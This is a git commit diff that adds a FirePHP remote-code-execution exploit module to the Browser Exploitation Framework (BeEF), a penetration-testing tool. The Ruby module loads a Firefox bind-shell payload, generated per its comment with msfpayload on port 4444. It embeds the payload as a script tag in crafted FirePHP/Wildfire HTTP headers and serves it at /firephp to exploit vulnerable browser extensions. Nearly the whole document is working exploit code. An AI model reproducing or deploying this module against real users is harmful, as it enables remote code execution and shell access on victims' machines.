Add FirePHP <= 0.7.1 RCE module

@Wireghoul Fixes issue #885
2014-05-05 10:32:59 +00:00
parent 4c2f80a3bc
commit abe1370a50
4 changed files with 283 additions and 0 deletions
--- a/modules/exploits/firephp/module.rb
+++ b/modules/exploits/firephp/module.rb
@@ -0,0 +1,70 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+class Firephp_code_exec < BeEF::Core::Command
+
+  def pre_send
+    rand_str = rand(32**10).to_s(32)
+
+    # load payload.js file
+    # generate payload:
+    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
+    payload = ""
+    f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
+    f.each_line do |line|
+      payload << line
+    end
+    f.close
+
+    # construct exploit+payload HTTP response
+    exploit = {
+      "RequestHeaders" => {
+        "1"=>"#{rand(10)}",
+        "2"=>"#{rand(10)}",
+        "3"=>"#{rand(10)}",
+        "4"=>"#{rand(10)}",
+        "5"=>"#{rand(10)}",
+        "6"=>"#{rand(10)}",
+        "7"=>"#{rand(10)}",
+        "8"=>"#{rand(10)}",
+        "9"=>"#{rand(10)}",
+        "<script>#{payload}<\/SCRIPT>" => rand_str
+      }
+    }.to_json
+
+    # mount exploit+payload at /firephp
+    # @todo use Router class instead of bind_raw()
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
+      {
+        'Content-Type'       => 'text/html',
+        'X-Wf-Protocol-1'    => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
+        'X-Wf-1-Plugin-1'    => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
+        'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
+        'X-Wf-1-1-1-1'       => "#{exploit.length}|#{exploit}|\r\n"
+      },
+      rand_str,   # HTTP body
+      '/firephp', # URI mount point
+      -1
+    )
+  end
+
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    beef_host = configuration.get("beef.http.public")      || configuration.get("beef.http.host")
+    beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+    url = "#{proto}://#{beef_host}:#{beef_port}"
+    return [
+      { 'name' => 'beef_url', 'description' => 'BeEF interface URL', 'ui_label' => 'BeEF URL', 'value' => url, 'width' => '200px' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end